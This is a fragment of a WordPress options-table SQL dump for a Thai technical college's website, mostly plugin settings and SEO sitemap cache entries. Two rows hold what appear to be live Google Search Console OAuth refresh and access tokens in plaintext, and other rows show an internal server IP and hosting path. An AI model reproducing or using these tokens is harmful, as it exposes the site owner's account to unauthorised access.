(33374, 'fs_active_plugins', 'O:8:\"stdClass\":3:{s:7:\"plugins\";a:1:{s:37:\"popup-maker/includes/pum-sdk/freemius\";O:8:\"stdClass\":4:{s:7:\"version\";s:5:\"2.2.4\";s:4:\"type\";s:6:\"plugin\";s:9:\"timestamp\";i:1577090006;s:11:\"plugin_path\";s:27:\"popup-maker/popup-maker.php\";}}s:7:\"abspath\";s:57:\"/home/technicray/domains/technicrayong.ac.th/public_html/\";s:6:\"newest\";O:8:\"stdClass\":5:{s:11:\"plugin_path\";s:27:\"popup-maker/popup-maker.php\";s:8:\"sdk_path\";s:37:\"popup-maker/includes/pum-sdk/freemius\";s:7:\"version\";s:5:\"2.2.4\";s:13:\"in_activation\";b:1;s:9:\"timestamp\";i:1577090006;}}', 'yes'),
(33375, 'fs_debug_mode', '', 'yes'),
(33376, 'fs_accounts', 'a:6:{s:11:\"plugin_data\";a:1:{s:11:\"popup-maker\";a:17:{s:16:\"plugin_main_file\";O:8:\"stdClass\":0:{}s:17:\"install_timestamp\";i:1517311063;s:16:\"sdk_last_version\";s:5:\"2.1.0\";s:11:\"sdk_version\";s:5:\"2.2.4\";s:16:\"sdk_upgrade_mode\";b:1;s:18:\"sdk_downgrade_mode\";b:0;s:19:\"plugin_last_version\";s:6:\"1.7.29\";s:14:\"plugin_version\";s:6:\"1.8.14\";s:19:\"plugin_upgrade_mode\";b:1;s:21:\"plugin_downgrade_mode\";b:0;s:21:\"is_plugin_new_install\";b:0;s:17:\"connectivity_test\";a:6:{s:12:\"is_connected\";b:1;s:4:\"host\";s:23:\"www.technicrayong.ac.th\";s:9:\"server_ip\";s:13:\"192.168.10.71\";s:9:\"is_active\";b:1;s:9:\"timestamp\";i:1517311063;s:7:\"version\";s:5:\"1.6.6\";}s:17:\"was_plugin_loaded\";b:1;s:15:\"prev_is_premium\";b:0;s:12:\"is_anonymous\";a:3:{s:2:\"is\";b:1;s:9:\"timestamp\";i:1517311084;s:7:\"version\";s:5:\"1.6.6\";}s:16:\"uninstall_reason\";O:8:\"stdClass\":3:{s:2:\"id\";s:1:\"5\";s:4:\"info\";s:0:\"\";s:12:\"is_anonymous\";b:0;}s:24:\"handle_gdpr_admin_notice\";b:1;}}s:13:\"file_slug_map\";a:1:{s:27:\"popup-maker/popup-maker.php\";s:11:\"popup-maker\";}s:7:\"plugins\";a:1:{s:11:\"popup-maker\";O:9:\"FS_Plugin\":20:{s:16:\"parent_plugin_id\";N;s:5:\"title\";s:11:\"Popup Maker\";s:4:\"slug\";s:11:\"popup-maker\";s:12:\"premium_slug\";s:19:\"popup-maker-premium\";s:4:\"type\";s:6:\"plugin\";s:20:\"affiliate_moderation\";b:0;s:19:\"is_wp_org_compliant\";b:1;s:4:\"file\";s:27:\"popup-maker/popup-maker.php\";s:7:\"version\";s:6:\"1.8.14\";s:11:\"auto_update\";N;s:4:\"info\";N;s:10:\"is_premium\";b:0;s:14:\"premium_suffix\";s:9:\"(Premium)\";s:7:\"is_live\";b:1;s:10:\"public_key\";s:32:\"pk_0a02cbd99443e0ab7211b19222fe3\";s:10:\"secret_key\";N;s:2:\"id\";s:3:\"147\";s:7:\"updated\";N;s:7:\"created\";N;s:22:\"\0FS_Entity\0_is_updated\";b:1;}}s:9:\"unique_id\";s:32:\"3b76c282305f6acdf6bf724db68dc906\";s:21:\"id_slug_type_path_map\";a:1:{i:147;a:2:{s:4:\"slug\";s:11:\"popup-maker\";s:4:\"type\";s:6:\"plugin\";}}s:13:\"admin_notices\";a:1:{s:11:\"popup-maker\";a:0:{}}}', 'yes'),
(33377, 'popmake_settings', 'a:1:{s:26:\"disable_popup_category_tag\";i:1;}', 'yes'),
(33378, 'pum_ver', '1.8.14', 'yes'),
(33379, 'fs_api_cache', 'a:0:{}', 'yes'),
(33385, 'popmake_default_theme', '898', 'yes'),
(33396, '_pum_installed_themes', 'a:5:{i:0;s:8:\"lightbox\";i:1;s:15:\"enterprise-blue\";i:2;s:9:\"hello-box\";i:3;s:12:\"cutting-edge\";i:4;s:13:\"framed-border\";}', 'yes'),
(33404, 'pum_reviews_installed_on', '2018-01-30 18:17:49', 'yes'),
(33411, 'pum_db_ver', '8', 'yes'),
(33455, 'pum_total_open_count', '1133193', 'yes'),
(34143, 'ms_hide_thankyou_ads_until', '1549418478', 'yes'),
(115535, 'pum_initial_version', '1.6.6', 'yes'),
(115536, 'pum_ver_upgraded_from', '1.7.29', 'yes'),
(115542, 'pum-has-cached-css', '1650962392', 'yes'),
(115543, 'pum-has-cached-js', '1650962392', 'yes'),
(153113, 'widget_jetpack_widget_social_icons', 'a:1:{s:12:\"_multiwidget\";i:1;}', 'yes'),
(153329, 'tablepress_plugin_options', '{\"plugin_options_db_version\":36,\"table_scheme_db_version\":3,\"prev_tablepress_version\":\"0\",\"tablepress_version\":\"1.9\",\"first_activation\":1525251087,\"message_plugin_update\":false,\"message_donation_nag\":true,\"use_custom_css\":true,\"use_custom_css_file\":true,\"custom_css\":\"\",\"custom_css_minified\":\"\",\"custom_css_version\":0}', 'yes'),
(153352, 'tablepress_tables', '{\"last_id\":20,\"table_post\":{\"1\":2047,\"2\":3484,\"3\":4209,\"4\":4910,\"7\":5716,\"11\":6225,\"15\":12532,\"16\":12533,\"17\":12534,\"19\":12575}}', 'yes'),
(156286, 'pum_version', '1.7.19', 'yes'),
(157126, 'pum_completed_upgrades', 'a:3:{i:0;s:16:\"core-v1_7-popups\";i:1;s:18:\"core-v1_7-settings\";i:2;s:16:\"core-v1_8-themes\";}', 'yes'),
(257395, 'wpsm_cns_default_settings', 's:331:\"a:11:{s:8:\"icon_clr\";s:7:\"#000000\";s:13:\"count_num_clr\";s:7:\"#000000\";s:15:\"count_title_clr\";s:7:\"#000000\";s:9:\"icon_size\";s:2:\"20\";s:14:\"count_num_size\";s:2:\"18\";s:10:\"title_size\";s:2:\"18\";s:9:\"cn_weight\";s:3:\"400\";s:11:\"font_family\";s:9:\"Open Sans\";s:12:\"display_icon\";s:3:\"yes\";s:9:\"cn_layout\";s:1:\"4\";s:10:\"custom_css\";s:0:\"\";}\";', 'yes'),
(257407, 'wpsm_cns_review', 'a:2:{s:4:\"time\";i:1532154736;s:9:\"dismissed\";b:0;}', 'yes'),
(342554, 'wpseo', 'a:19:{s:15:\"ms_defaults_set\";b:0;s:7:\"version\";s:3:\"8.0\";s:20:\"disableadvanced_meta\";b:1;s:19:\"onpage_indexability\";b:1;s:11:\"baiduverify\";s:0:\"\";s:12:\"googleverify\";s:0:\"\";s:8:\"msverify\";s:0:\"\";s:12:\"yandexverify\";s:0:\"\";s:9:\"site_type\";s:0:\"\";s:20:\"has_multiple_authors\";b:1;s:16:\"environment_type\";s:10:\"production\";s:23:\"content_analysis_active\";b:1;s:23:\"keyword_analysis_active\";b:1;s:21:\"enable_admin_bar_menu\";b:1;s:26:\"enable_cornerstone_content\";b:1;s:18:\"enable_xml_sitemap\";b:1;s:24:\"enable_text_link_counter\";b:1;s:22:\"show_onboarding_notice\";b:0;s:18:\"first_activated_on\";i:1534754005;}', 'yes'),
(342555, 'wpseo_titles', 'a:72:{s:10:\"title_test\";i:0;s:17:\"forcerewritetitle\";b:0;s:9:\"separator\";s:7:\"sc-dash\";s:16:\"title-home-wpseo\";s:42:\"%%sitename%% %%page%% %%sep%% %%sitedesc%%\";s:18:\"title-author-wpseo\";s:41:\"%%name%%, Author at %%sitename%% %%page%%\";s:19:\"title-archive-wpseo\";s:38:\"%%date%% %%page%% %%sep%% %%sitename%%\";s:18:\"title-search-wpseo\";s:63:\"You searched for %%searchphrase%% %%page%% %%sep%% %%sitename%%\";s:15:\"title-404-wpseo\";s:35:\"Page not found %%sep%% %%sitename%%\";s:19:\"metadesc-home-wpseo\";s:0:\"\";s:21:\"metadesc-author-wpseo\";s:0:\"\";s:22:\"metadesc-archive-wpseo\";s:0:\"\";s:9:\"rssbefore\";s:0:\"\";s:8:\"rssafter\";s:53:\"The post %%POSTLINK%% appeared first on %%BLOGLINK%%.\";s:20:\"noindex-author-wpseo\";b:0;s:28:\"noindex-author-noposts-wpseo\";b:1;s:21:\"noindex-archive-wpseo\";b:1;s:14:\"disable-author\";b:0;s:12:\"disable-date\";b:0;s:19:\"disable-post_format\";b:0;s:18:\"disable-attachment\";b:1;s:23:\"is-media-purge-relevant\";b:0;s:20:\"breadcrumbs-404crumb\";s:25:\"Error 404: Page not found\";s:29:\"breadcrumbs-display-blog-page\";b:1;s:20:\"breadcrumbs-boldlast\";b:0;s:25:\"breadcrumbs-archiveprefix\";s:12:\"Archives for\";s:18:\"breadcrumbs-enable\";b:0;s:16:\"breadcrumbs-home\";s:4:\"Home\";s:18:\"breadcrumbs-prefix\";s:0:\"\";s:24:\"breadcrumbs-searchprefix\";s:16:\"You searched for\";s:15:\"breadcrumbs-sep\";s:7:\"»\";s:12:\"website_name\";s:57:\"วิทยาลัยเทคนิคระยอง\";s:11:\"person_name\";s:0:\"\";s:22:\"alternate_website_name\";s:0:\"\";s:12:\"company_logo\";s:0:\"\";s:12:\"company_name\";s:57:\"วิทยาลัยเทคนิคระยอง\";s:17:\"company_or_person\";s:7:\"company\";s:17:\"stripcategorybase\";b:0;s:10:\"title-post\";s:39:\"%%title%% %%page%% %%sep%% %%sitename%%\";s:13:\"metadesc-post\";s:0:\"\";s:12:\"noindex-post\";b:0;s:13:\"showdate-post\";b:0;s:23:\"display-metabox-pt-post\";b:1;s:10:\"title-page\";s:39:\"%%title%% %%page%% %%sep%% %%sitename%%\";s:13:\"metadesc-page\";s:0:\"\";s:12:\"noindex-page\";b:0;s:13:\"showdate-page\";b:0;s:23:\"display-metabox-pt-page\";b:1;s:16:\"title-attachment\";s:39:\"%%title%% %%page%% %%sep%% %%sitename%%\";s:19:\"metadesc-attachment\";s:0:\"\";s:18:\"noindex-attachment\";b:0;s:19:\"showdate-attachment\";b:0;s:29:\"display-metabox-pt-attachment\";b:1;s:18:\"title-tax-category\";s:53:\"%%term_title%% Archives %%page%% %%sep%% %%sitename%%\";s:21:\"metadesc-tax-category\";s:0:\"\";s:28:\"display-metabox-tax-category\";b:1;s:20:\"noindex-tax-category\";b:0;s:18:\"title-tax-post_tag\";s:53:\"%%term_title%% Archives %%page%% %%sep%% %%sitename%%\";s:21:\"metadesc-tax-post_tag\";s:0:\"\";s:28:\"display-metabox-tax-post_tag\";b:1;s:20:\"noindex-tax-post_tag\";b:0;s:21:\"title-tax-post_format\";s:53:\"%%term_title%% Archives %%page%% %%sep%% %%sitename%%\";s:24:\"metadesc-tax-post_format\";s:0:\"\";s:31:\"display-metabox-tax-post_format\";b:1;s:23:\"noindex-tax-post_format\";b:1;s:23:\"post_types-post-maintax\";i:0;s:20:\"title-e_org_chart_ps\";s:39:\"%%title%% %%page%% %%sep%% %%sitename%%\";s:23:\"metadesc-e_org_chart_ps\";s:0:\"\";s:22:\"noindex-e_org_chart_ps\";b:0;s:23:\"showdate-e_org_chart_ps\";b:0;s:33:\"display-metabox-pt-e_org_chart_ps\";b:1;s:23:\"post_types-page-maintax\";i:0;s:29:\"post_types-attachment-maintax\";i:0;}', 'yes'),
(342556, 'wpseo_social', 'a:18:{s:13:\"facebook_site\";s:34:\"https://web.facebook.com/RayongTC/\";s:13:\"instagram_url\";s:0:\"\";s:12:\"linkedin_url\";s:0:\"\";s:11:\"myspace_url\";s:0:\"\";s:16:\"og_default_image\";s:0:\"\";s:18:\"og_frontpage_title\";s:0:\"\";s:17:\"og_frontpage_desc\";s:0:\"\";s:18:\"og_frontpage_image\";s:0:\"\";s:9:\"opengraph\";b:1;s:13:\"pinterest_url\";s:0:\"\";s:15:\"pinterestverify\";s:0:\"\";s:14:\"plus-publisher\";s:0:\"\";s:7:\"twitter\";b:1;s:12:\"twitter_site\";s:0:\"\";s:17:\"twitter_card_type\";s:19:\"summary_large_image\";s:11:\"youtube_url\";s:0:\"\";s:15:\"google_plus_url\";s:45:\"https://plus.google.com/110840827482846746577\";s:10:\"fbadminapp\";s:0:\"\";}', 'yes'),
(342557, 'wpseo_flush_rewrite', '1', 'yes'),
(342579, 'akismet_comment_form_privacy_notice', 'hide', 'yes'),
(342609, 'jetpack_sitemap_location', '', 'yes'),
(342612, 'jetpack-sitemap-state', 'a:5:{s:12:\"sitemap-type\";s:10:\"jp_sitemap\";s:10:\"last-added\";i:0;s:6:\"number\";i:0;s:13:\"last-modified\";s:19:\"1970-01-01 00:00:00\";s:3:\"max\";a:0:{}}', 'yes'),
(342646, 'wpseo-gsc', 'a:1:{s:7:\"profile\";s:30:\"http://www.technicrayong.ac.th\";}', 'yes'),
(342649, 'wpseo-gsc-refresh_token', '1/LbGcq6j7wTYn7vVKUT4QAmHmuagHSQy-EAfewIWueM6mym3TuPvj0zXYMrFvHl7i', 'yes'),
(342650, 'wpseo-gsc-access_token', 'a:5:{s:13:\"refresh_token\";s:66:\"1/LbGcq6j7wTYn7vVKUT4QAmHmuagHSQy-EAfewIWueM6mym3TuPvj0zXYMrFvHl7i\";s:12:\"access_token\";s:131:\"ya29.GlwHBiNfedbDtCHS8uAKdhAyak6uBmZ5G6tdH0U5YjK5XXqm0Dk3N8ufEb-iZ0SFjLfAzNsZNBdTdKv_SMDJhveFna8loCAEs_XG-RrL-G_Sdy2KYf1-btua52MxBg\";s:7:\"expires\";i:1535467955;s:10:\"expires_in\";i:3600;s:7:\"created\";i:1535439155;}', 'yes'),
(342655, 'wpseo_sitemap_cache_validator_global', '2PBQk', 'no'),
(342668, 'wpseo_gsc_issues_counts', 'a:2:{s:3:\"web\";a:6:{s:9:\"not_found\";a:2:{s:5:\"count\";s:1:\"0\";s:10:\"last_fetch\";N;}s:12:\"not_followed\";a:2:{s:5:\"count\";s:1:\"0\";s:10:\"last_fetch\";N;}s:13:\"access_denied\";a:2:{s:5:\"count\";s:1:\"0\";s:10:\"last_fetch\";N;}s:12:\"server_error\";a:2:{s:5:\"count\";s:1:\"0\";s:10:\"last_fetch\";N;}s:8:\"soft_404\";a:2:{s:5:\"count\";s:1:\"0\";s:10:\"last_fetch\";N;}s:5:\"other\";a:2:{s:5:\"count\";s:1:\"0\";s:10:\"last_fetch\";N;}}s:15:\"smartphone_only\";a:9:{s:9:\"not_found\";a:2:{s:5:\"count\";s:1:\"0\";s:10:\"last_fetch\";N;}s:12:\"not_followed\";a:2:{s:5:\"count\";s:1:\"0\";s:10:\"last_fetch\";N;}s:13:\"access_denied\";a:2:{s:5:\"count\";s:1:\"0\";s:10:\"last_fetch\";N;}s:12:\"server_error\";a:2:{s:5:\"count\";s:1:\"0\";s:10:\"last_fetch\";N;}s:8:\"soft_404\";a:2:{s:5:\"count\";s:1:\"0\";s:10:\"last_fetch\";N;}s:7:\"roboted\";a:2:{s:5:\"count\";s:2:\"26\";s:10:\"last_fetch\";N;}s:16:\"faulty_redirects\";a:2:{s:5:\"count\";s:1:\"0\";s:10:\"last_fetch\";N;}i:0;a:2:{s:5:\"count\";s:1:\"0\";s:10:\"last_fetch\";N;}s:5:\"other\";a:2:{s:5:\"count\";s:1:\"0\";s:10:\"last_fetch\";N;}}}', 'yes'),
(342747, 'wpseo_sitemap_1_cache_validator', 'Yu97', 'no'),
(342748, 'wpseo_sitemap_customize_changeset_cache_validator', '2MtKO', 'no'),
(342794, 'wpseo_sitemap_page_cache_validator', '46gPg', 'no'),
(343185, 'wpseo_sitemap_jp_sitemap_cache_validator', 'YqLy', 'no'),
(343186, 'wpseo_sitemap_jp_img_sitemap_cache_validator', 'YqMP', 'no'),
(343187, 'wpseo_sitemap_jp_sitemap_master_cache_validator', 'YqNN', 'no'),
(349029, 'wpseo_sitemap_post_cache_validator', 'Yu9Y', 'no'),
(349200, 'wpseo_sitemap_category_cache_validator', '3xYKY', 'no'),
(349248, 'wpseo_sitemap_attachment_cache_validator', '41Ah1', 'no'),
(349254, 'wpseo_sitemap_3826_cache_validator', '3BXd', 'no'),
(349514, 'wpseo_sitemap_3829_cache_validator', 'sxH1', 'no'),
(354456, 'wpseo_sitemap_author_cache_validator', '38eYR', 'no'),
(354629, 'wpseo_sitemap_3678_cache_validator', '3ph2o', 'no'),
(354630, 'wpseo_sitemap_3691_cache_validator', '3ph3g', 'no'),
(354631, 'wpseo_sitemap_3737_cache_validator', '3ph3x', 'no'),
(354632, 'wpseo_sitemap_3738_cache_validator', '3ph3O', 'no'),
(354633, 'wpseo_sitemap_3746_cache_validator', '3ph47', 'no'),
(354634, 'wpseo_sitemap_3771_cache_validator', '3ph4p', 'no'),
(354635, 'wpseo_sitemap_3774_cache_validator', '3ph4H', 'no'),
(355595, 'wpseo_sitemap_3787_cache_validator', '3pjjm', 'no'),
(361334, 'wpseo_sitemap_3800_cache_validator', '3pmQW', 'no'),
(361335, 'wpseo_sitemap_3801_cache_validator', '3pmRw', 'no'),
(385128, 'wpseo_sitemap_3842_cache_validator', 'EheW', 'no'),
(385154, 'wpseo_sitemap_3841_cache_validator', 'EuhU', 'no'),
(385199, 'wpseo_sitemap_3845_cache_validator', '52eP', 'no'),
(385389, 'wpseo_sitemap_3848_cache_validator', 'IGIw', 'no'),
(385492, 'wpseo_sitemap_3852_cache_validator', 'K3nj', 'no'),
(385583, 'wpseo_sitemap_3855_cache_validator', '5HNg', 'no'),
(386331, 'wpseo_gsc_last_fetch', '1535439156', 'no'),
(386471, 'wpseo_sitemap_3859_cache_validator', 'cWn9', 'no'),
(386828, 'wpseo_sitemap_3833_cache_validator', '3pgFx', 'no'),
(388000, 'wpseo_sitemap_3862_cache_validator', '2VCs3', 'no'),
(389746, 'wpseo_sitemap_3871_cache_validator', '2MGIu', 'no'),
(390987, 'wpseo_sitemap_3874_cache_validator', 'YgSE', 'no'),
(391331, 'wpseo_sitemap_3834_cache_validator', '3pwuk', 'no'),
(395332, 'wpseo_sitemap_3878_cache_validator', '2w2vv', 'no'),
(395392, 'wpseo_sitemap_3882_cache_validator', 'ak8u', 'no'),
(395456, 'wpseo_sitemap_3885_cache_validator', '2yiV9', 'no'),
(395501, 'wpseo_sitemap_3888_cache_validator', 'aAzL', 'no'),
(395568, 'wpseo_sitemap_3804_cache_validator', '2BqQj', 'no'),
(395837, 'wpseo_sitemap_3840_cache_validator', '3plDa', 'no'),
(396718, 'wpseo_sitemap_3893_cache_validator', '2d7Fj', 'no'),
(396928, 'wpseo_sitemap_3896_cache_validator', 'bf3U', 'no'),
(410299, 'wpseo_sitemap_3620_cache_validator', '3w7vO', 'no'),
(412026, 'wpseo_sitemap_3904_cache_validator', '2Bvk9', 'no'),
(412055, 'wpseo_sitemap_3905_cache_validator', '2BYAl', 'no'),
(412097, 'wpseo_sitemap_3908_cache_validator', '2CESH', 'no'),
(412155, 'wpseo_sitemap_3911_cache_validator', '2DPdn', 'no'),
(412307, 'wpseo_sitemap_3914_cache_validator', '2M9W7', 'no'),
(412365, 'wpseo_sitemap_3917_cache_validator', '2N5r9', 'no'),
(412746, 'wpseo_sitemap_3877_cache_validator', '3pjWA', 'no'),
(426402, 'wpseo_sitemap_3922_cache_validator', '2jHpP', 'no'),
(426448, 'wpseo_sitemap_3925_cache_validator', '2krwq', 'no'),
(432443, 'wpseo_sitemap_3681_cache_validator', '3w1AU', 'no'),
(432444, 'wpseo_sitemap_3762_cache_validator', '3w1C7', 'no'),
(432445, 'wpseo_sitemap_3763_cache_validator', '3w1Cw', 'no'),
(432446, 'wpseo_sitemap_3661_cache_validator', '3w1CS', 'no'),
(457014, 'wpseo_sitemap_3942_cache_validator', 'PdNu', 'no'),
(457468, 'wpseo_sitemap_3954_cache_validator', '2Om5U', 'no'),
(457525, 'wpseo_sitemap_3958_cache_validator', '2P6PB', 'no'),
(457579, 'wpseo_sitemap_3961_cache_validator', '2QeUb', 'no'),
(457628, 'wpseo_sitemap_3965_cache_validator', 'chI8', 'no'),
(457653, 'wpseo_sitemap_3968_cache_validator', '2ReiP', 'no'),
(457710, 'wpseo_sitemap_3971_cache_validator', '2Sjb7', 'no'),
(457792, 'wpseo_sitemap_3975_cache_validator', '2U1hT', 'no'),
(457857, 'wpseo_sitemap_3979_cache_validator', '2W3NA', 'no'),
(457926, 'wpseo_sitemap_3982_cache_validator', '2X2DF', 'no'),
(457969, 'wpseo_sitemap_3985_cache_validator', '2XTkX', 'no'),
(458023, 'wpseo_sitemap_3988_cache_validator', '2YEVr', 'no'),
(458179, 'wpseo_sitemap_3921_cache_validator', '3pt3h', 'no'),
(463109, 'wpseo_sitemap_3993_cache_validator', 'UTLS', 'no'),
(471162, 'wpseo_sitemap_3928_cache_validator', '3plAE', 'no'),
(471163, 'wpseo_sitemap_3929_cache_validator', '3plB8', 'no'),
(471164, 'wpseo_sitemap_3930_cache_validator', '3plBr', 'no'),
(506215, 'wpseo_sitemap_4006_cache_validator', 'FY1V', 'no'),
(506607, 'wpseo_sitemap_3992_cache_validator', '3pifh', 'no'),
(518013, 'wpseo_sitemap_4010_cache_validator', 'AQ4f', 'no'),
(518088, 'wpseo_sitemap_4013_cache_validator', 'CeJR', 'no'),
(518165, 'wpseo_sitemap_4017_cache_validator', '5frB', 'no'),
(518394, 'wpseo_sitemap_4020_cache_validator', 'XTui', 'no'),
(519874, 'wpseo_sitemap_4023_cache_validator', '5srf', 'no'),
(519942, 'wpseo_sitemap_4026_cache_validator', 'Lsuq', 'no'),
(520016, 'wpseo_sitemap_4029_cache_validator', 'NvkI', 'no'),
(520073, 'wpseo_sitemap_4033_cache_validator', 'OjaF', 'no'),
(526855, 'wpseo_sitemap_4054_cache_validator', '549b', 'no'),
(527178, 'wpseo_sitemap_4057_cache_validator', 'HvY8', 'no'),
(527868, 'wpseo_sitemap_4060_cache_validator', 'Md6E', 'no'),
(528056, 'wpseo_sitemap_4063_cache_validator', 'Nmig', 'no'),
(536885, 'wpseo_sitemap_4070_cache_validator', 'VNYN', 'no'),
(536947, 'wpseo_sitemap_4073_cache_validator', 'X7Tf', 'no'),
(537277, 'wpseo_sitemap_4076_cache_validator', '2BAwa', 'no'),
(538575, 'wpseo_sitemap_4079_cache_validator', 'TmAM', 'no'),
(539013, 'wpseo_sitemap_3996_cache_validator', '3pibH', 'no'),
(539014, 'wpseo_sitemap_4000_cache_validator', '3picb', 'no'),
(544932, 'wpseo_sitemap_popup_cache_validator', 'tqm2', 'no'),
(545313, 'wpseo_sitemap_4093_cache_validator', '5jgpo', 'no'),
(562796, 'wpseo_sitemap_4009_cache_validator', '3pgWh', 'no'),
(567982, 'wpseo_sitemap_4032_cache_validator', '3phH5', 'no'),
(571907, 'wpseo_sitemap_4098_cache_validator', '5KcW', 'no'),
(571980, 'wpseo_sitemap_4101_cache_validator', 'NNRI', 'no'),
(572609, 'wpseo_sitemap_4069_cache_validator', 'fDhB', 'no'),
(597225, 'wpseo_sitemap_4104_cache_validator', '7wxD', 'no'),
(599845, 'wpseo_sitemap_4082_cache_validator', '3phUe', 'no'),
(601163, 'wpseo_sitemap_4115_cache_validator', '22Nqh', 'no'),
(601188, 'wpseo_sitemap_4116_cache_validator', '23wc4', 'no'),
(602803, 'wpseo_sitemap_4107_cache_validator', 'sYdb', 'no'),
(604820, 'wpseo_sitemap_4097_cache_validator', '3povi', 'no'),
(607137, 'wpseo_sitemap_4139_cache_validator', '3YnzY', 'no'),
(607226, 'wpseo_sitemap_4147_cache_validator', '444Hp', 'no'),
(607233, 'wpseo_sitemap_4145_cache_validator', 'jC6n', 'no'),
(607240, 'wpseo_sitemap_4144_cache_validator', '446Qz', 'no'),
(607247, 'wpseo_sitemap_4143_cache_validator', '447Tz', 'no'),
(621338, 'wpseo_sitemap_4150_cache_validator', 'MHKx', 'no'),
(621475, 'wpseo_sitemap_4154_cache_validator', 'Rq5k', 'no'),
(621550, 'wpseo_sitemap_4157_cache_validator', 'SCa1', 'no'),
(632915, 'wpseo_sitemap_4160_cache_validator', '3nqDE', 'no'),
(632966, 'wpseo_sitemap_4163_cache_validator', '3ogUJ', 'no'),
(633012, 'wpseo_sitemap_4129_cache_validator', '3pi5U', 'no'),
(638084, 'wpseo_sitemap_4166_cache_validator', 'drbI', 'no'),
(641404, 'wpseo_sitemap_4169_cache_validator', '23FhF', 'no'),
(641701, 'wpseo_sitemap_4172_cache_validator', '2SgvL', 'no'),
(641894, 'wpseo_sitemap_4138_cache_validator', '3pr7d', 'no'),
(666036, 'wpseo_sitemap_4176_cache_validator', '2yal1', 'no'),
(666100, 'wpseo_sitemap_4179_cache_validator', '2z9QM', 'no'),
(666207, 'wpseo_sitemap_4182_cache_validator', '2EK4L', 'no'),
(666563, 'wpseo_sitemap_4193_cache_validator', '3qLlB', 'no'),
(670567, 'wpseo_sitemap_4199_cache_validator', '2EU9S', 'no'),
(670972, 'wpseo_sitemap_tablepress_table_cache_validator', '2ZohJ', 'no'),
(671066, 'wpseo_sitemap_4213_cache_validator', '3wkgA', 'no'),
(690608, 'wpseo_sitemap_4234_cache_validator', '34Lu7', 'no'),
(690790, 'wpseo_sitemap_4175_cache_validator', '3phPo', 'no'),
(701356, 'wpseo_sitemap_4240_cache_validator', '53Jj2', 'no'),
(703584, 'wpseo_sitemap_4260_cache_validator', '24GeX', 'no'),
(705329, 'wpseo_sitemap_4265_cache_validator', 'XWbz', 'no'),
(705725, 'wpseo_sitemap_4269_cache_validator', '32QQc', 'no'),
(706133, 'wpseo_sitemap_ml-slider_cache_validator', '4oDtW', 'no'),
(706134, 'wpseo_sitemap_ml-slide_cache_validator', '4oDug', 'no'),
(707861, 'wpseo_sitemap_nav_menu_item_cache_validator', '36l3d', 'no'),
(708002, 'wpseo_sitemap_4301_cache_validator', '2znfr', 'no'),
(708063, 'wpseo_sitemap_4304_cache_validator', '2APT1', 'no'),
(710834, 'wpseo_sitemap_4208_cache_validator', '3ptkD', 'no'),
(727282, 'wpseo_sitemap_4353_cache_validator', '2w2Dr', 'no'),
(728280, 'wpseo_sitemap_4361_cache_validator', '2JCh4', 'no'),
(729664, 'wpseo_sitemap_4415_cache_validator', '4Peho', 'no'),
(730402, 'wpseo_sitemap_4362_cache_validator', 'DnHf', 'no'),
(730409, 'wpseo_sitemap_4423_cache_validator', 'DoWT', 'no'),
(730429, 'wpseo_sitemap_4424_cache_validator', 'DMuI', 'no'),
(730484, 'wpseo_sitemap_4365_cache_validator', 'EHHR', 'no'),
(730518, 'wpseo_sitemap_4366_cache_validator', 'FKyA', 'no'),
(730565, 'wpseo_sitemap_4429_cache_validator', 'GVPy', 'no'),
(735976, 'wpseo_sitemap_4239_cache_validator', '3pjXe', 'no'),
(735977, 'wpseo_sitemap_4247_cache_validator', '3pjXQ', 'no'),
(738035, 'wpseo_sitemap_4514_cache_validator', 'I1OD', 'no'),
(738974, 'wpseo_sitemap_4532_cache_validator', '2OY8c', 'no'),
(738999, 'wpseo_sitemap_4533_cache_validator', '2P8Wl', 'no'),
(739006, 'wpseo_sitemap_4535_cache_validator', '2P9XZ', 'no'),
(743516, 'wpseo_sitemap_4613_cache_validator', '3cSRy', 'no'),
(743535, 'wpseo_sitemap_4615_cache_validator', 'eres', 'no'),
(743668, 'wpseo_sitemap_4291_cache_validator', '3pmz4', 'no'),
(768732, 'wpseo_sitemap_4620_cache_validator', '2nlwy', 'no'),
(768738, 'wpseo_sitemap_4621_cache_validator', '2nme3', 'no'),
(768820, 'wpseo_sitemap_4619_cache_validator', '9J1P', 'no'),
(769116, 'wpseo_sitemap_4311_cache_validator', '3pgYN', 'no'),
(769117, 'wpseo_sitemap_4356_cache_validator', '3pgZq', 'no'),
(769118, 'wpseo_sitemap_4409_cache_validator', '3pgZU', 'no'),
(773525, 'wpseo_sitemap_4629_cache_validator', '2KPU3', 'no'),
(773591, 'wpseo_sitemap_4632_cache_validator', '2MAES', 'no'),
(773670, 'wpseo_sitemap_4635_cache_validator', '2ORHh', 'no'),
(773813, 'wpseo_sitemap_4638_cache_validator', '358gM', 'no'),
(774028, 'wpseo_sitemap_4422_cache_validator', '3pixS', 'no'),
(786029, 'wpseo_sitemap_4641_cache_validator', 'AFjF', 'no'),
(791563, 'wpseo_sitemap_4651_cache_validator', 'Ftte', 'no'),
(791752, 'wpseo_sitemap_4654_cache_validator', 'LfOC', 'no'),
(791786, 'wpseo_sitemap_4655_cache_validator', 'LBUv', 'no'),
(795331, 'wpseo_sitemap_4512_cache_validator', '3pgt3', 'no'),
(818164, 'wpseo_sitemap_4557_cache_validator', '3pijR', 'no'),
(830610, 'wpseo_sitemap_4657_cache_validator', '2iAnS', 'no'),
(836099, 'wpseo_sitemap_4662_cache_validator', 'IyVG', 'no'),
(836341, 'wpseo_sitemap_4665_cache_validator', 'WTA8', 'no'),
(836448, 'wpseo_sitemap_4668_cache_validator', '22S5R', 'no'),
(838080, 'wpseo_sitemap_4672_cache_validator', 'nreh', 'no'),
(838142, 'wpseo_sitemap_4675_cache_validator', 'oqiY', 'no'),
(838193, 'wpseo_sitemap_4678_cache_validator', 'pgBD', 'no'),
(841049, 'wpseo_sitemap_4679_cache_validator', '3ctr5', 'no'),
(841059, 'wpseo_sitemap_4682_cache_validator', '3cxJn', 'no'),
(846932, 'wpseo_sitemap_4685_cache_validator', 'BtiD', 'no'),
(846975, 'wpseo_sitemap_4687_cache_validator', 'Cyim', 'no'),
(847252, 'wpseo_sitemap_4692_cache_validator', 'ZoJe', 'no'),
(847421, 'wpseo_sitemap_4698_cache_validator', '28Spl', 'no'),
(847475, 'wpseo_sitemap_4701_cache_validator', '29USc', 'no'),
(847612, 'wpseo_sitemap_4704_cache_validator', '2m8Ag', 'no'),
(847795, 'wpseo_sitemap_4708_cache_validator', '2EXUR', 'no'),
(847855, 'wpseo_sitemap_4711_cache_validator', '2FWDZ', 'no'),
(847912, 'wpseo_sitemap_4715_cache_validator', '2GJkw', 'no'),
